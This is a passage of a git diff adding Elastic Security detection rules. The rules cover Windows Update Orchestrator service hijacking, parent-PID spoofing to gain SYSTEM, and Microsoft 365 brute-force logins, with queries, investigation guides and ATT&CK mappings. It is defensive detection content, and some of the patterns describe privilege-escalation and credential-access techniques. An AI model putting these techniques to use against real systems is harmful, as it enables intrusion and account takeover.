spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", + "references": [ + "https://github.com/irsl/CVE-2020-1313" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "265db8f5-fc73-4d0d-b434-6483b56372e2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json new file mode 100644 index 00000000000..83335c658d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Update Orchestrator Service Hijack", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", + "references": [ + "https://github.com/irsl/CVE-2020-1313" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "265db8f5-fc73-4d0d-b434-6483b56372e2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json new file mode 100644 index 00000000000..b7d8d287c36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies parent process spoofing used to create an elevated child process. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileges Elevation via Parent Process PID Spoofing", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\") and\n not (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Netwrix Corporation\" and\n process.name : \"adcrcpy.exe\" and process.parent.executable : (\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.EventCollector.exe\",\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.Analyzer.exe\",\n \"?:\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.EventCollector.exe\"\n )\n )\n", + "references": [ + "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", + "https://blog.didierstevens.com/2017/03/20/", + "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26b01043-4f04-4d2f-882a-5a1d2e95751b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "26b01043-4f04-4d2f-882a-5a1d2e95751b_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json new file mode 100644 index 00000000000..8366016c5db --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Willem D'Haese", + "Austin Songer" + ], + "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempts to Brute Force a Microsoft 365 User Account", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n", + "references": [ + "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 104 + }, + "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json new file mode 100644 index 00000000000..befc1c688aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Willem D'Haese", + "Austin Songer" + ], + "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempts to Brute Force a Microsoft 365 User Account", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n", + "references": [ + "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json new file mode 100644 index 00000000000..67010786c06 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Willem D'Haese", + "Austin Songer" + ], + "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempts to Brute Force a Microsoft 365 User Account", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n", + "references": [ + "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": 